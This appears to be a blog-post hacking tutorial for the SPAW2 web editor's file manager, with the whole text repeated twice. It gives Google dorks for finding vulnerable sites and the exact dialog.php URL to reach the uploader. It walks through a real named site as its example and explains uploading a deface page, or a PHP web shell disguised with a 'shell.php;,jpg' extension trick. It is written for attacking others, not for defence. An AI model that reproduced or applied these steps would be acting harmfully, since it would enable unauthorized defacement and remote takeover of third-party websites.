spaw Deface and Shell Upload Vunerablity
Spaw is a Vunerablity, you Can Upload your deface & Shell Easily in Vunerable websites
Lets Start
open www.google.com
enter The Dork inurl:"spaw2/dialogs/"
or
: inurl:"spaw2/uploads/files/"
You will Got results Like this "Index of/ spaw2/dialogs/"
or
: site.com/abc/spaw2/uploads/files/abc/abc.pdf
Now replace The Spaw2/Uploads/abc/abc ur with this url
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
for example i got this website
http://climatechange.jgsee.org/Admin/spaw2/uploads/files/%E0%B8%AB%E0%B8%99%E0%B8%B1%E0%B8%87%E0%B8%AA%E0%B8%B7%E0%B8%AD%20Climate%20Change.pdf
so Now i will replcae
/Admin/spaw2/uploads/files/%E0%B8%AB%E0%B8%99%E0%B8%B1%E0%B8%87%E0%B8%AA%E0%B8%B7%E0%B8%AD%20Climate%20Change.pdf with /spaw2/uploads/files/%E0%B8%AB%E0%B8%99%E0%B8%B1%E0%B8%87%E0%B8%AA%E0%B8%B7%E0%B8%AD%20Climate%20Change.pdf
With
/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
Now the URL is
http://climatechange.jgsee.org/Admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
Now you will Got a window like this
if you want to Upload deface page then Select files option ... and i f you want to upload shell then select image option and upload your shell as shell.php;,jpg
see You uploaded deface here
www.site.com/profile/spaw2/uploads/
Lets Start
open www.google.com
enter The Dork inurl:"spaw2/dialogs/"
or
: inurl:"spaw2/uploads/files/"
You will Got results Like this "Index of/ spaw2/dialogs/"
or
: site.com/abc/spaw2/uploads/files/abc/abc.pdf
Now replace The Spaw2/Uploads/abc/abc ur with this url
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
for example i got this website
http://climatechange.jgsee.org/Admin/spaw2/uploads/files/%E0%B8%AB%E0%B8%99%E0%B8%B1%E0%B8%87%E0%B8%AA%E0%B8%B7%E0%B8%AD%20Climate%20Change.pdf
so Now i will replcae
/Admin/spaw2/uploads/files/%E0%B8%AB%E0%B8%99%E0%B8%B1%E0%B8%87%E0%B8%AA%E0%B8%B7%E0%B8%AD%20Climate%20Change.pdf with /spaw2/uploads/files/%E0%B8%AB%E0%B8%99%E0%B8%B1%E0%B8%87%E0%B8%AA%E0%B8%B7%E0%B8%AD%20Climate%20Change.pdf
With
/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
Now the URL is
http://climatechange.jgsee.org/Admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
Now you will Got a window like this
if you want to Upload deface page then Select files option ... and i f you want to upload shell then select image option and upload your shell as shell.php;,jpg
see You uploaded deface here
www.site.com/profile/spaw2/uploads/
0 comments:
Post a Comment